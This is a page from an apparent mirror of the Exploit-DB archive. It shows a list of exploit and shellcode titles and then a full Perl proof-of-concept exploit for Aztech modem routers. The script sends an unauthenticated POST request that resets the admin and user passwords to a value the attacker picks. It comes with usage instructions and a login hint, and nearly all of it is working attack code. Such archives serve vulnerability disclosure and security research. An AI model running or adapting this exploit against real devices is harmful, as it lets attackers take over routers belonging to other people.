bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/39316.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

79 lines
No EOL
2.9 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/69811/info
Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected device.
#!/usr/bin/perl
# Title: Aztech Modem Broken Session Management Exploit
# Author: Eric Fajardo - fjpfajardo@ph.ibm.com
#
# A successful authentication of a privilege (admin) ID in the
# web portal allows any attacker in the network to hijack and
# reuse the existing session in order to trick and allow the web
# server to execute administrative commands. The command may be
# freely executed from any terminal in the network as long as
# the session of the privilege ID is valid. The below PoC shows
# an un-authenticated request to the web server for an administrator
# and user password reset.
#
# This exploit was tested working with the following modems:
# - DSL5018EN(1T1R) from Globe Telecom
# - DSL705E
# - DSL705EU
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "---------------------------------------------\n";
print "++ Aztech Modem Broken Session Management Exploit\n";
print "++ Usage: perl $0 TARGET:PORT NEWPASSWORD\n";
print "++ Ex: perl $0 192.168.254.254:80 h4rh4rHaR\n\n";
exit;
}
my $TARGET = $ARGV[0];
my $NEWPASS = $ARGV[1];
my ($HOST, $PORT)= split(':',$TARGET);
my $PATH = "/cgi-bin/admAccess.asp";
system ('clear');
print "---------------------------------------------\n";
print "++ Sending POST string to $TARGET ...\n";
my $PAYLOAD = "saveFlag=1&adminFlag=1&SaveBtn=SAVE&uiViewTools_Password=$NEWPASS&uiViewTools_PasswordConfirm=$NEWPASS&uiViewTools_Password1=$NEWPASS&uiViewTools_PasswordConfirm1=$NEWPASS";
my $POST = "POST $PATH HTTP/1.1";
my $ACCEPT = "Accept: text/html, application/xhtml+xml, */*";
my $REFERER = "Referer: http://$HOST/cgi-bin/admAccess.asp";
my $LANG = "Accept-Language: en-US";
my $AGENT = "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25";
my $CONTYPE = "Content-Type: application/x-www-form-urlencoded";
my $ACENCODING = "Accept-Encoding: gzip, deflate";
my $PROXYCONN = "Proxy-Connection: Keep-Alive";
my $CONNLENGTH = "Content-Length: 179";
my $DNT = "DNT: 1";
my $TARGETHOST = "Host: $HOST";
my $PRAGMA = "Pragma: no-cache";
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
print $sock "$POST\n";
print $sock "$ACCEPT\n";
print $sock "$REFERER\n";
print $sock "$LANG\n";
print $sock "$AGENT\n";
print $sock "$CONTYPE\n";
print $sock "$ACENCODING\n";
print $sock "$PROXYCONN\n";
print $sock "$CONNLENGTH\n";
print $sock "$DNT\n";
print $sock "$TARGETHOST\n";
print $sock "$PRAGMA\n\n";
print $sock "$PAYLOAD\n";
print "++ Sent. Connect to the web URL http://$HOST with user:admin password:$NEWPASS\n";
$sock->close();
exit;
Reference in a new issue View git blame Copy permalink